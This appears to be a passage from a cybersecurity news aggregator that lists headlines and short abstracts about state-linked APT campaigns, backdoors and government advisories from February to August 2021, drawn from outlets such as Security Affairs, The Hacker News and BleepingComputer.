After detecting this attack and conducting an investigation, security analysts came to know that this attack operates by a threat actor hijacking, or obtaining access to the AD FS server.GB Hackers
August 29, 2021
SparklingGoblin’s SideWalk Hints Toward the Maker of CrossWalk Full Text
Abstract
The new SideWalk backdoor seen in a recent campaign by a Chinese APT was found to share multiple similarities with CrossWalk, another backdoor used by the group. SideWalk and CrossWalk share a resemblance in anti-tampering techniques, threading model, data layout, and the way data is managed during the...Cyware Alerts - Hacker News
August 27, 2021
FIN8 Targets US Bank With New ‘Sardonic’ Backdoor Full Text
Abstract
The latest refinement of the APT’s BadHatch backdoor can leverage new malware on the fly without redeployment, making it potent and nimble.Threatpost
August 26, 2021
Earth Baku (APT41) Active Target Victims in Indo-Pacific Region Full Text
Abstract
Trend Micro researchers stumbled across a cyberespionage campaign by Earth Baku, or APT41, compromising public and private entities alike located in the Indo-Pacific region. The group deploys previously unknown shellcode loaders, now known as StealthVector and StealthMutant, along with a backdoor i...Cyware Alerts - Hacker News
August 19, 2021
NK-linked InkySquid APT leverages IE exploits in recent attacks Full Text
Abstract
North Korea-linked InkySquid group leverages two Internet Explorer exploits to deliver a custom implant in attacks aimed at a South Korean online newspaper. Experts from cybersecurity firm Volexity reported that North Korea-linked InkySquid group...Security Affairs
August 11, 2021
UNC215, an alleged China-linked APT group targets Israel orgs Full Text
Abstract
China-linked threat actor UNC215 targeted Israeli organizations in a long-running campaign and used false flags to trick victims into believing the attacks were from Iran. A China-linked cyber-espionage group has targeted Israeli organizations and government...Security Affairs
August 4, 2021
New Infrastructure Linked to APT29’s WellMess Malware Full Text
Abstract
RiskIQ laid bare more than 30 active C&C servers delivering WellMess and WellMail malware, allegedly owned by Russian-speaking attack group APT29. It is infamous for targeted attacks aimed at U.S. organizations. Federal agencies and organizations are suggested to stay vigilant, focus on pr...Cyware Alerts - Hacker News
August 4, 2021
China-linked APT31 targets Russia for the first time Full Text
Abstract
China-linked APT31 group employed a new strain of malware in attacks aimed at entities in Mongolia, Belarus, Canada, the US, and Russia. Researchers from Positive Technologies reported that China-linked APT31 group has been using a new piece of malware...Security Affairs
August 3, 2021
Iranian APT Lures Defense Contractor in Catfishing-Malware Scam Full Text
Abstract
Fake aerobics-instructor profile delivers malware in a supply-chain attack attempt from TA456.Threatpost
August 3, 2021
China-linked APT groups target telecom companies in Southeast Asia Full Text
Abstract
China-linked APT groups have targeted networks of at least five major telecommunications companies operating in Southeast Asia since 2017. Cybereason researchers identified three clusters of activity associated with China-linked threat actors...Security Affairs
August 3, 2021
GhostEmperor - Another Chinese APT Group Targeting Southeast Asia Full Text
Abstract
Kaspersky documented a new Chinese-speaking threat actor—GhostEmperor—targeting Microsoft Exchange flaws in high-profile attacks in Southeast Asia. The group uses a formerly unknown Windows kernel-mode rootkit to gain remote control over targeted servers. Recently, several Chinese APT groups have b...Cyware Alerts - Hacker News
August 3, 2021
China-linked APTs Launched DeadRinger Campaign to Strike Major Telecommunications Companies in Southeast Asia Full Text
Abstract
Cybereason believes the attacks are the work of advanced persistent threat (APT) groups linked to Chinese state-sponsorship due to overlaps in tactics and techniques with other known Chinese APTs.ZDNet
August 02, 2021
New APT Hacking Group Targets Microsoft IIS Servers with ASP.NET Exploits Full Text
Abstract
A new highly capable and persistent threat actor has been targeting major high-profile public and private entities in the U.S. as part of a series of targeted cyber intrusion attacks by exploiting internet-facing Microsoft Internet Information Services (IIS) servers to infiltrate their networks. Israeli cybersecurity firm Sygnia, which identified the campaign, is tracking the advanced, stealthy adversary under the moniker "Praying Mantis" or "TG1021." "TG1021 uses a custom-made malware framework, built around a common core, tailor-made for IIS servers. The toolset is completely volatile, reflectively loaded into an affected machine's memory and leaves little-to-no trace on infected targets," the researchers said. "The threat actor also uses an additional stealthy backdoor and several post-exploitation modules to perform network reconnaissance, elevate privileges, and move laterally within networks." Besides exhibiting capabilities...The Hacker News
July 29, 2021
Praying Mantis is now Preying on Microsoft’s IIS Servers Full Text
Abstract
Sygnia researchers reported a new APT group—Praying Mantis or TG1021—targeting Microsoft IIS web servers to reach victims’ internal networks to steal sensitive data. To stay protected, researchers recommend patching .NET deserialization vulnerabilities and scanning internet-facing IIS servers with...Cyware Alerts - Hacker News
July 27, 2021
APT Group Praying Mantis Hits IIS Web Servers with Deserialization Flaws and Memory Resident Malware Full Text
Abstract
A sophisticated, likely government-sponsored threat actor has been compromising major public and private organizations over the past year by exploiting deserialization flaws in public-facing ASP.NET applications to deploy fileless malware.CSO Online
July 22, 2021
APT Hackers Distributed Android Trojan via Syrian e-Government Portal Full Text
Abstract
An advanced persistent threat (APT) actor has been tracked in a new campaign deploying Android malware via the Syrian e-Government Web Portal, indicating an upgraded arsenal designed to compromise victims. "To the best of our knowledge, this is the first time that the group has been publicly observed using malicious Android applications as part of its attacks," Trend Micro researchers Zhengyu Dong, Fyodor Yarochkin, and Steven Du said in a technical write-up published Wednesday. StrongPity, also codenamed Promethium by Microsoft, is believed to have been active since 2012 and has typically focused on targets across Turkey and Syria. In June 2020, the espionage threat actor was connected to a wave of activities that banked on watering hole attacks and tampered installers, which abuse the popularity of legitimate applications, to infect targets with malware. "Promethium has been resilient over the years," Cisco Talos disclosed last year. "Its campai...The Hacker News
July 21, 2021
France ANSSI agency warns of APT31 campaign against French organizations Full Text
Abstract
French cyber-security agency ANSSI warned of an ongoing cyberespionage campaign aimed at French organizations carried out by China-linked APT31 group. The French national cyber-security agency ANSSI warned of ongoing attacks against a large number...Security Affairs
July 21, 2021
StrongPity APT Group Deploys Android Malware for the First Time Full Text
Abstract
Trend Micro conducted an investigation into an Android malware sample, believed to be linked to the StrongPity APT group, that was posted on the Syrian e-Gov website.Trend Micro
July 21, 2021
France warns of APT31 cyberspies targeting French organizations Full Text
Abstract
The French national cyber-security agency today warned of an ongoing series of attacks against a large number of French organizations coordinated by the Chinese-backed APT31 cyberespionage group.BleepingComputer
July 19, 2021
US indicts members of Chinese-backed hacking group APT40 Full Text
Abstract
Today, the US Department of Justice (DOJ) indicted four members of the Chinese state-sponsored hacking group known as APT40 for hacking various companies, universities, and government entities in the US and worldwide between 2011 and 2018.BleepingComputer
July 17, 2021
LuminousMoth - Another Chinese APT Targeting Asian Governments Full Text
Abstract
Kaspersky discovered an ongoing, large-scale APT campaign named LuminousMoth with hundreds of victims from Southeast Asia, including Myanmar and the Philippines government entities. The recent activities of the APT group indicate the wider interests of China-based hackers toward Southeast Asian gov...Cyware Alerts - Hacker News
July 16, 2021
The Definitive RFP Templates for EDR/EPP and APT Protection Full Text
Abstract
Advanced Persistent Threat groups were once considered a problem that concerns Fortune 100 companies only. However, the threat landscape of recent years tells otherwise—in fact, every organization, regardless of vertical and size, is at risk, whether as a direct target, supply chain or collateral damage. The vast majority of security decision-makers acknowledge they need to address the APT risk with additional security solutions but struggle with mapping APT attack vectors to a clear-cut set of security product capabilities, which impairs their ability to choose the products that would best protect them. Cynet is now addressing this need with the definitive RFP templates for EDR/EPP and APT Protection, an expert-made security requirement list that enables stakeholders to accelerate and optimize the evaluation process of the products they evaluate. These RFP templates aim to capture the widest common denominator in terms of security needs and deliver the essential that are...The Hacker News
July 15, 2021
Charming Kitten APT is Now Targeting Middle-East Scholars Full Text
Abstract
Iranian state-aligned threat actor TA453 hacked a website pertaining to the University of London to steal information from journalists, professors, and think tanks, under a campaign dubbed SpoofedScholars. The APT group is continuously innovating and developing new ways of attacking users. Organizat...Cyware Alerts - Hacker News
July 14, 2021
China-linked LuminousMoth APT targets entities from Southeast Asia Full Text
Abstract
LuminousMoth: Kaspersky uncovered an ongoing and large-scale APT campaign that targeted government entities in Southeast Asia, including Myanmar and the Philippines. Kaspersky experts uncovered an ongoing and large-scale cyber espionage campaign,...Security Affairs
July 14, 2021
Chinese cyberspies’ wide-scale APT campaign hits Asian govt entities Full Text
Abstract
Kaspersky researchers have revealed an ongoing and large-scale advanced persistent threat (APT) campaign with hundreds of victims from Southeast Asia, including Myanmar and the Philippines government entities.BleepingComputer
July 13, 2021
‘Charming Kitten’ APT Siphons Intel From Mid-East Scholars Full Text
Abstract
Professors, journalists and think-tank personnel, beware strangers bearing webinars: It’s the focus of a particularly sophisticated, and chatty, phishing campaign.Threatpost
July 9, 2021
WildPressure APT Group is Continuously Sharpening its Tools Full Text
Abstract
Kaspersky spotted the WildPressure APT group deploying new malware to target businesses in the oil and gas sector, through both Windows and macOS systems. Experts also noted some similarities between the techniques of the WildPressure APT and BlackShadow, which also targets organizations in the Middl...Cyware Alerts - Hacker News
July 7, 2021
WildPressure APT expands operations targeting the macOS platform Full Text
Abstract
WildPressure APT has been targeting industrial organizations in the Middle East since 2019 and was recently spotted using new malware that targets both Windows and macOS. Researchers from Kaspersky have spotted a new malware used by the WildPressure APT group...Security Affairs
July 7, 2021
MacOS Targeted in WildPressure APT Malware Campaign Full Text
Abstract
Threat actors enlist compromised WordPress websites in campaign targeting macOS users.Threatpost
July 07, 2021
WildPressure APT Emerges With New Malware Targeting Windows and macOS Full Text
Abstract
A malicious campaign that has set its sights on industrial-related entities in the Middle East since 2019 has resurfaced with an upgraded malware toolset to strike both Windows and macOS operating systems, symbolizing an expansion in both its targets and its strategy around distributing threats. Russian cybersecurity firm Kaspersky attributed the attacks to an advanced persistent threat (APT) it tracks as "WildPressure," with victims believed to be in the oil and gas industry. WildPressure first came to light in March 2020 based off of a malware operation distributing a fully-featured C++ Trojan dubbed "Milum" that enabled the threat actor to gain remote control of the compromised device. The attacks were said to have begun as early as August 2019. "For their campaign infrastructure, the operators used rented OVH and Netzbetrieb virtual private servers (VPS) and a domain registered with the Domains by Proxy anonymization service," Kaspersky researcher Denis...The Hacker News
July 7, 2021
Russian Cozy Bear APT Group Allegedly Breached Republican National Committee via Third-party Provider Full Text
Abstract
The hacker group has been tied to Russia’s foreign intelligence service and has previously been accused of breaching the Democratic National Committee in 2016 and SolarWinds more recently.Bloomberg
July 7, 2021
WildPressure APT Group Targets the macOS Platform with New Python Trojan Full Text
Abstract
The versioning system shows that the malware used by WildPressure is still under active development. Besides commercial VPS, this time the operators used compromised legitimate WordPress websites.Kaspersky Labs
July 01, 2021
IndigoZebra APT Hacking Campaign Targets the Afghan Government Full Text
Abstract
Cybersecurity researchers are warning of ongoing attacks coordinated by a suspected Chinese-speaking threat actor targeting the Afghanistan government as part of an espionage campaign that may have had its provenance as far back as 2014. Israeli cybersecurity firm Check Point Research attributed the intrusions to a hacking group tracked under the moniker "IndigoZebra," with past activity aimed at other central-Asian countries, including Kyrgyzstan and Uzbekistan. "The threat actors behind the espionage leveraged Dropbox, the popular cloud-storage service, to infiltrate the Afghan National Security Council (NSC)," the researchers said in a technical write-up shared with The Hacker News, adding they "orchestrated a ministry-to-ministry style deception, where an email is sent to a high-profile target from the mailboxes of another high-profile victim." IndigoZebra first came to light in August 2017 when Kaspersky detailed a covert operation that single...The Hacker News
July 1, 2021
UK, US agencies warn of large-scale brute-force attacks carried out by Russian APT Full Text
Abstract
US and UK cybersecurity agencies said the Russia-linked APT28 group is behind a series of large-scale brute-force attacks. US and UK cybersecurity agencies said today that a Russian military cyber unit has been behind a series of brute-force attacks that...Security Affairs
June 29, 2021
Cobalt Strike: Favorite Tool from APT to Crimeware Full Text
Abstract
Cobalt Strike is a legitimate penetration testing tool used by security professionals to emulate malicious activity in a network. However, threat actors are increasingly abusing the tool.Proofpoint
June 22, 2021
South Korean Nuclear Research Agency Targeted by APT Group Full Text
Abstract
Nuclear energy and arms-related organizations are under attack from several other APT groups across the globe. A North Korean APT group recently breached the internal network of the Korea Atomic Energy Research Institute (KAERI), South Korea through a vulnerability in a VPN server last month.Cyware Alerts - Hacker News
June 20, 2021
Norway blames China-linked APT31 for 2018 government hack Full Text
Abstract
Norway's Police Security Service said that the China-linked APT31 group was behind the 2018 cyberattack on the government’s IT network. Norway’s Police Security Service (PST) said that the China-linked APT31 cyberespionage group was behind the attack...Security Affairs
June 19, 2021
North Korean APT group Kimsuky allegedly hacked South Korea’s atomic research agency KAERI Full Text
Abstract
North Korea-linked APT group Kimsuky allegedly breached South Korea’s atomic research agency KAERI by exploiting a VPN vulnerability. South Korean representatives declared on Friday that North Korea-linked APT group Kimsuky is believed to have breached...Security Affairs
June 18, 2021
The return of TA402 Molerats APT after a short pause Full Text
Abstract
TA402 APT group (aka Molerats and GazaHackerTeam) is back after two months of silence and is targeting governments in the Middle East. The TA402 APT group (aka Molerats and Gaza Cybergang) is back after two months of apparent inactivity and is targeting...Security Affairs
June 17, 2021
Ferocious Kitten APT targets Telegram and Psiphon VPN users in Iran Full Text
Abstract
Iran-linked Ferocious Kitten APT group used instant messaging apps and VPN software like Telegram and Psiphon to deliver Windows RAT and spy on targets' devices. Researchers from Kaspersky reported that Iran-linked threat actors, tracked as Ferocious...Security Affairs
June 15, 2021
Microsoft Defender ATP now warns of jailbroken iPhones, iPads Full Text
Abstract
Microsoft has added support for detecting jailbroken iOS devices to Microsoft Defender for Endpoint, the enterprise version of its Windows 10 Defender antivirus.BleepingComputer
June 13, 2021
BackdoorDiplomacy APT targets diplomats from Africa and the Middle East Full Text
Abstract
ESET researchers discovered an advanced persistent threat (APT) group, tracked as BackdoorDiplomacy, that is targeting diplomats across Africa and the Middle East. ESET researchers spotted a new state-sponsored group, dubbed BackdoorDiplomacy,...Security Affairs
June 8, 2021
New SkinnyBoy Malware Linked with APT28 Full Text
Abstract
Cluster25 found a new SkinnyBoy malware that has been used by the APT28 group in multiple spear-phishing campaigns against military and government institutions in the U.S. and Europe. The malware has a low level of sophistication; however, it cannot be taken lightly, as this could be in its early s...Cyware Alerts - Hacker News
June 7, 2021
Novel ‘Victory’ Backdoor Spotted in Chinese APT Campaign Full Text
Abstract
Researchers said the malware has been under development for at least three years.Threatpost
June 7, 2021
Kimsuky APT Group is Evolving; A Matter to be Worried About Full Text
Abstract
North Korean APT group Kimsuky, also known as Thallium, Black Banshee, and Velvet Chollima, has been found adopting new TTPs as it continues to launch espionage attacks.Cyware Alerts - Hacker News
June 6, 2021
Chinese SharpPanda APT developed a new backdoor in the last 3 years Full Text
Abstract
Check Point Research (CPR) said that the Chinese APT group SharpPanda spent three years developing a new backdoor to spy on Asian governments. Researchers from Check Point Research (CPR) discovered a new backdoor while investigating a cyber espionage...Security Affairs
June 3, 2021
Chinese APT Groups Launching Backdoor Attacks to Spy on Southeast Asian Governments Full Text
Abstract
Check Point Research said that the backdoor has been designed, developed, tested, and deployed over the past three years to compromise a Southeast Asian nation's Ministry of Foreign Affairs.ZDNet
June 2, 2021
Another APT Group Piercing into U.S. Local Government Networks Full Text
Abstract
Foreign hackers made their way into the webserver of a local U.S. municipal government after exploiting vulnerabilities in an unpatched Fortinet VPN appliance. The FBI shared IOCs for the same.Cyware Alerts - Hacker News
June 2, 2021
US seizes 2 domains used by APT29 in a recent phishing campaign Full Text
Abstract
The US DoJ seized two domains used by the APT29 group in recent attacks impersonating USAID to spread malware. The US Department of Justice (DoJ) and the Federal Bureau of Investigation have seized two domains used by the Russia-linked APT29...Security Affairs
June 2, 2021
Kimsuky APT Continues to Target South Korean Government Using AppleSeed Backdoor Full Text
Abstract
The Kimsuky APT—also known as Thallium, Black Banshee, and Velvet Chollima—is a North Korean threat actor that has been active since 2012. It conducts cyber espionage operations against South Korea.Malwarebytes Labs
June 01, 2021
US seizes domains used by APT29 in recent USAID phishing attacks Full Text
Abstract
The US Department of Justice has seized two Internet domains used in recent phishing attacks impersonating the U.S. Agency for International Development (USAID) to distribute malware and gain access to internal networks.BleepingComputer
May 29, 2021
Chinese APT Groups Continue to Pound Away on Pulse Secure VPNs Full Text
Abstract
Multiple threat groups believed to be working in support of China's long-term economic interests are continuing to hammer away at networks belonging to organizations in the US and Europe.Dark Reading
May 28, 2021
China-linked APT groups target orgs via Pulse Secure VPN devices Full Text
Abstract
Researchers from FireEye warn that China-linked APT groups continue to target Pulse Secure VPN devices to compromise networks. Cybersecurity researchers from FireEye warn once again that Chinese APT groups continue to target Pulse Secure VPN devices...Security Affairs
May 28, 2021
Updates on Chinese APT Actors Compromising Pulse Secure VPN Devices Full Text
Abstract
Mandiant identified 16 malware families exclusively designed to infect Pulse Secure VPN appliances and used by several cyberespionage groups which are believed to be linked to the Chinese government.FireEye
May 28, 2021
Microsoft Suspects Russia’s Cozy Bear APT Behind Attack Against U.S. Aid Agency Full Text
Abstract
By breaching the systems of a supplier used by the federal government, the hackers sent out genuine-looking emails to more than 3,000 accounts across more than 150 organizations linked to USAID.New York Times
May 27, 2021
APT hacked a US municipal government via an unpatched Fortinet VPN Full Text
Abstract
The FBI revealed that foreign hackers compromised the network of a local US municipal government by exploiting flaws in an unpatched Fortinet VPN. The Federal Bureau of Investigation (FBI) reported that an APT group had breached the network of a local...Security Affairs
May 27, 2021
FBI: APT hackers breached US local govt by exploiting Fortinet bugs Full Text
Abstract
The Federal Bureau of Investigation (FBI) says the webserver of a US municipal government was breached by state-sponsored attackers after hacking a Fortinet appliance.BleepingComputer
May 16, 2021
Pakistan-linked Transparent Tribe APT expands its arsenal Full Text
Abstract
Alleged Pakistan-linked cyber espionage group, tracked as Transparent Tribe, targets Indian entities with a new Windows malware. Researchers from Cisco Talos warn that the Pakistan-linked APT group Transparent Tribe expanded its Windows malware arsenal...Security Affairs
May 13, 2021
Transparent Tribe APT Expands its Windows Malware Arsenal with ObliqueRAT Full Text
Abstract
Transparent Tribe, also known as APT36 and Mythic Leopard, continues to create fake domains mimicking legitimate military and defense organizations as a core component of their operations.Cisco Talos
May 11, 2021
10 APT groups that joined the MS Exchange exploitation party Full Text
Abstract
Research by ESET showed that the vulnerabilities CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 were exploited by at least 10 APT groups since the release of the patches.Cyber News
May 8, 2021
Russian cyber-spies changed tactics after the UK and US outed their techniques – so here’s a list of those changes Full Text
Abstract
Russian spies from APT29 responded to Western agencies outing their tactics by adopting a red-teaming tool to blend into targets' networks as a legitimate pentesting exercise.The Register
May 7, 2021
Russia-linked APT29 group changes TTPs following April advisories Full Text
Abstract
The UK and US cybersecurity agencies have published a report detailing techniques used by the Russia-linked cyberespionage group known as APT29 (aka Cozy Bear). Today, the UK NCSC and the CISA-FBI-NSA cybersecurity agencies published a joint security advisory that...Security Affairs
May 6, 2021
Chinese APT Groups Targeting Russian Defense Contractors Full Text
Abstract
Hackers infiltrated the systems of Rubin Central Design Bureau for Marine Engineering, a Russian submarine design firm, using a new malware called PortDoor. It is suspected that Chinese actors could be behind the attack.Cyware Alerts - Hacker News
May 6, 2021
Chinese PLA Unit 61419 suspected to have purchased AVs for cyber-espionage Full Text
Abstract
Chinese military unit PLA Unit 61419 is suspected to be involved in cyber-espionage campaigns against multiple antivirus companies. Researchers from cybersecurity firm Recorded Future’s Insikt Group have discovered six procurement documents from...Security Affairs
May 3, 2021
Naikon APT Group is Now Using Nebulae Backdoor Full Text
Abstract
Researchers uncovered mischievous activities by the Naikon hacking group, which has been deploying a new backdoor against military organizations in Southeast Asia for over two years.Cyware Alerts - Hacker News
May 3, 2021
Russia-Linked SVR APT Group Exploiting Five Known Vulnerabilities Full Text
Abstract
A joint advisory by the FBI, CISA, and NSA disclosed that the Russian APT group is exploiting flaws in Fortinet, Zimbra, Citrix, Pulse Secure, and VMware solutions to obtain login credentials.Cyware Alerts - Hacker News
April 30, 2021
China-linked APT uses a new backdoor in attacks at Russian defense contractor Full Text
Abstract
China-linked APT group targets Russian nuclear sub designer with an undocumented backdoor. A China-linked cyberespionage group targets a Russian defense contractor involved in designing nuclear submarines for the Russian Navy. Cybereason researchers...Security Affairs
April 28, 2021
Naikon APT group uses new Nebulae backdoor in attacks aimed at military orgs Full Text
Abstract
China-linked APT Naikon employed a new backdoor in multiple cyber-espionage operations targeting military organizations from Southeast Asia in the last 2 years. The Naikon APT group is a China-linked cyber espionage group that has been active...Security Affairs
April 27, 2021
An APT Group Exploits VPN to Deploy Supernova on SolarWinds Orion Full Text
Abstract
The U.S. CISA has disclosed details of a new APT that leverages the Supernova backdoor to compromise SolarWinds Orion installations after gaining access to the network through a VPN service.Cyware Alerts - Hacker News
April 21, 2021
Japanese Law Enforcement Names Chinese Military Linked Tick APT to Hundreds of Breaches Full Text
Abstract
Japanese law enforcement believes a group of hackers linked to the Chinese military are behind a broad cyber-espionage campaign that has breached more than 200 Japanese companies since at least 2016.The Record
April 21, 2021
China-linked APT used Pulse Secure VPN zero-day to hack US defense contractors Full Text
Abstract
At least one China-linked APT group exploited a new zero-day flaw in Pulse Secure VPN equipment to break into the networks of US defense contractors. According to coordinated reports published by FireEye and Pulse Secure, two hacking groups have...Security Affairs
April 21, 2021
Multiple APT Groups Exploit Critical Pulse Secure Zero-Day Full Text
Abstract
Customers urged to take immediate action against nation-state threatInfosecurity Magazine
April 20, 2021
North Korea-linked Lazarus APT hides malicious code within BMP image to avoid detection Full Text
Abstract
North Korea-linked Lazarus APT group is abusing bitmap (.BMP) image files in a recent spear-phishing campaign targeting entities in South Korea. Experts from Malwarebytes have uncovered a spear-phishing attack conducted by a North Korea-linked Lazarus...Security Affairs
April 19, 2021
Lazarus APT Hackers are now using BMP images to hide RAT malware Full Text
Abstract
A spear-phishing attack operated by a North Korean threat actor targeting its southern counterpart has been found to conceal its malicious code within a bitmap (.BMP) image file to drop a remote access trojan (RAT) capable of stealing sensitive information. Attributing the attack to the Lazarus Group based on similarities to prior tactics adopted by the adversary, researchers from Malwarebytes said the phishing campaign started by distributing emails laced with a malicious document that it identified on April 13. "The actor has used a clever method to bypass security mechanisms in which it has embedded its malicious HTA file as a compressed zlib file within a PNG file that then has been decompressed during run time by converting itself to the BMP format," Malwarebytes researchers said. "The dropped payload was a loader that decoded and decrypted the second stage payload into memory. The second stage payload has the capability to receive and execute commandsThe Hacker News
April 19, 2021
Iron Tiger APT Group Roars Louder With New Toolkit Full Text
Abstract
Iron Tiger threat actor group was spotted using an upgraded toolkit in an 18-month old cyberespionage campaign against a gambling firm in the Philippines.Cyware Alerts - Hacker News
April 16, 2021
Russia-linked APT SVR actively targets these 5 flaws Full Text
Abstract
The US government warned that Russian cyber espionage group SVR is exploiting five known vulnerabilities in enterprise infrastructure products. The U.S. National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal...Security Affairs
April 9, 2021
APTs Exploiting Fortinet VPN Security Vulnerabilities - Cybersecurity Agencies Warn Full Text
Abstract
Nation-state APTs are actively exploiting known vulnerabilities in the Fortinet FortiOS cybersecurity OS to gain initial access to multiple government, commercial, and technology services.Cyware Alerts - Hacker News
April 8, 2021
New APT27 Cyberespionage Campaign Unveiled Full Text
Abstract
Kaspersky spotted a cyberespionage campaign targeted against government and military organizations in Vietnam via DLL side-loading.Cyware Alerts - Hacker News
April 7, 2021
APT Group Using Voice Changing Software in Spear-Phishing Campaign Full Text
Abstract
A sub-group of the 'Molerats' threat-actor has been using voice-changing software to successfully trick targets into installing malware, according to a warning from Cado Security.Security Week
April 6, 2021
Chinese Cycldek APT targets Vietnamese Military and Government in sophisticated attacks Full Text
Abstract
China-linked APT group Cycldek is behind an advanced cyberespionage campaign targeting entities in the government and military sector in Vietnam. China-linked APT group LuckyMouse (aka Cycldek, Goblin Panda, Hellsing, APT 27, and Conimes) is targeting...Security Affairs
April 5, 2021
A41APT: An APT Campaign, a Multi-Layer Malware, and Japanese Targets Full Text
Abstract
The activity related to the campaign was first observed in November 2020 when reports of Japan-linked organizations being targeted in 17 regions across the world emerged.Cyware Alerts - Hacker News
April 2, 2021
FBI and CISA are warning of APT actors targeting Fortinet FortiOS servers Full Text
Abstract
FBI and CISA published a joint alert to warn of advanced persistent threat (APT) groups targeting Fortinet FortiOS to access networks of multiple organizations. The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security...Security Affairs
April 2, 2021
APTs targeting Fortinet, CISA and FBI warn Full Text
Abstract
The Cybersecurity and Infrastructure Security Agency (CISA) and FBI issued a joint advisory Friday that advanced persistent threat groups are scanning for vulnerable Fortinet products. "It is likely that the APT actors are scanning for these vulnerabilities to gain access to multiple government, commercial, and technology services networks," reads the advisory. The APTs, which CISA…SCMagazine
March 31, 2021
Calypso APT Eyes Microsoft Exchange Vulnerabilities Full Text
Abstract
The China-linked Calypso APT group was observed to be targeting vulnerable Microsoft Exchange servers to deploy web shells and eventually load the PlugX malware.Cyware Alerts - Hacker News
March 31, 2021
APT Charming Kitten Pounces on Medical Researchers Full Text
Abstract
Researchers uncover a credential-stealing campaign targeting genetic, neurology and oncology professionals.Threatpost
March 29, 2021
China-linked RedEcho APT took down part of its C2 domains Full Text
Abstract
China-linked APT group RedEcho has taken down its attack infrastructure after it was exposed at the end of February by security researchers. China-linked APT group RedEcho has taken down its attack infrastructure after security experts have exposed...Security Affairs
March 28, 2021
MuddyWater APT Goes Ham on its Targets Full Text
Abstract
This month, Trend Micro attributed a newly discovered cyber espionage campaign, dubbed Earth Vetala, to the politically motivated hacking group.Cyware Alerts - Hacker News
March 25, 2021
Facebook took action against China-linked APT targeting Uyghur activists Full Text
Abstract
Facebook has closed accounts used by a China-linked APT to distribute malware to spy on Uyghur activists, journalists, and dissidents living outside China. Facebook has taken action against a series of accounts used by a China-linked cyber-espionage...Security Affairs
March 23, 2021
What You Need to Know About Operation Diànxùn Full Text
Abstract
This cyber espionage campaign has been targeting telecom companies since August 2020 and has been attributed to the RedDelta threat actor, also known as TA416 and Mustang Panda.Cyware Alerts - Hacker News
March 19, 2021
APT31 Fingered for Cyber-Attack on Finnish Parliament Full Text
Abstract
Finland says its government was spied on by a threat group with links to the Chinese governmentInfosecurity Magazine
March 18, 2021
China-linked APT31 group was behind the attack on Finnish Parliament Full Text
Abstract
China-linked cyber espionage group APT31 is believed to be behind an attack on the Parliament of Finland that took place in 2020. China-linked cyber espionage group APT31 is believed to be behind an attack on the Parliament of Finland that took place...Security Affairs
March 17, 2021
China-based Mustang Panda APT Targets Telecom Companies to Steal 5G Secrets Full Text
Abstract
At least 23 telecommunications providers in Southeast Asia, Europe, and the United States, are suspected to have been targeted as part of the campaign that has been active since at least August 2020.ZDNet
March 15, 2021
What You Need to Know About RedEcho Full Text
Abstract
The victimology of this Chinese hacker group coincides with that of APT41, also known as Barium. Moreover, RedEcho boasts of a robust infrastructure.Cyware Alerts - Hacker News
March 15, 2021
Multiple APT Groups Now Targeting Microsoft Exchange Servers Full Text
Abstract
Several threat actors have been found exploiting the recently disclosed ProxyLogon vulnerabilities in Microsoft Exchange servers including APT27, LuckyMouse, Calypso, and Winnti Group.Cyware Alerts - Hacker News
March 13, 2021
The fire in the OVH datacenter also impacted APTs and cybercrime groups Full Text
Abstract
The fire at the OVH datacenter in Strasbourg also impacted the command and control infrastructure used by several nation-state APT groups and cybercrime gangs. OVH, one of the largest hosting providers in the world, has suffered this week a terrible...Security Affairs
March 11, 2021
RedXOR, a new powerful Linux backdoor in Winnti APT arsenal Full Text
Abstract
Intezer experts have spotted a new strain of Linux backdoor dubbed RedXOR that is believed to be part of the arsenal of the China-linked Winnti APT. Researchers from Intezer have discovered a new sophisticated backdoor, tracked as RedXOR, that targets...Security Affairs
March 10, 2021
ESET: More Than 10 APT Groups Exploiting Recent Microsoft Exchange Vulnerabilities Full Text
Abstract
Security firm identifies more than 5000 email servers affected globallyInfosecurity Magazine
March 7, 2021
Russia-linked APT groups exploited Lithuanian infrastructure to launch attacks Full Text
Abstract
Russia-linked APT groups leveraged the Lithuanian nation’s technology infrastructure to launch cyber-attacks against targets worldwide. The annual national security threat assessment report released by Lithuania’s State Security Department states...Security Affairs
March 3, 2021
Nation-State Hackers are Now Hiring Mercenary APT Groups Full Text
Abstract
A Blackberry report unveiled that state-backed actors often collaborate with mercenary APT groups to excel in attacks. Simultaneously, it helps state-backed actors lie low with their game plan.Cyware Alerts - Hacker News
March 2, 2021
Alleged China-linked APT41 group targets Indian critical infrastructures Full Text
Abstract
Recorded Future researchers uncovered a campaign conducted by Chinese APT41 group targeting critical infrastructure in India. Security researchers at Recorded Future have spotted a suspected Chinese APT actor targeting critical infrastructure operators...Security Affairs
February 26, 2021
Chinese Group APT31 Used NSA Exploit Three Years Before Shadow Brokers Leak Full Text
Abstract
A report revealed that a Chinese APT has been abusing a Windows zero-day exploit, stolen from the NSA’s Equation Group even before The Shadow Brokers group leaked it.Cyware Alerts - Hacker News
February 25, 2021
Old foe or new enemy? Here’s how researchers handle APT attribution Full Text
Abstract
Identifying a new actor is the first step in creating a defense, but attribution is hard to confirm due to use of common toolsets.SCMagazine
February 25, 2021
North Korea-linked Lazarus APT targets defense industry with ThreatNeedle backdoor Full Text
Abstract
North Korea-linked Lazarus APT group has targeted the defense industry with the custom backdoor dubbed ThreatNeedle since 2020. North Korea-linked Lazarus APT group has targeted the defense industry with the backdoor dubbed ThreatNeedle since early...Security Affairs
February 24, 2021
Ukraine: nation-state hackers hit government document management system Full Text
Abstract
Ukraine's government attributes a cyberattack on the government document management system to a Russia-linked APT group. The Ukrainian government blames a Russia-linked APT group for an attack on a government document management system, the System...Security Affairs
February 24, 2021
APT32 state hackers target human rights defenders with spyware Full Text
Abstract
Vietnam-linked APT32 group targeted Vietnamese human rights defenders (HRDs) between February 2018 and November 2020. Vietnam-linked APT32 (aka Ocean Lotus) group has conducted a cyberespionage campaign targeting Vietnamese human rights defenders...Security Affairs
February 23, 2021
APT32 state hackers target human rights defenders with spyware Full Text
Abstract
Vietnam-backed hacking group APT32 has coordinated several spyware attacks targeting Vietnamese human rights defenders (HRDs) between February 2018 and November 2020.BleepingComputer
February 23, 2021
Cisco points to new tier of APT actors that behave more like cybercriminals Full Text
Abstract
New Cisco research shows that the Gamaredon group, traditionally associated with attacks against Ukraine, is willing to target anybody, unlike the traditional model of espionage focusing on a few defined regions or industries at a time.SCMagazine
February 18, 2021
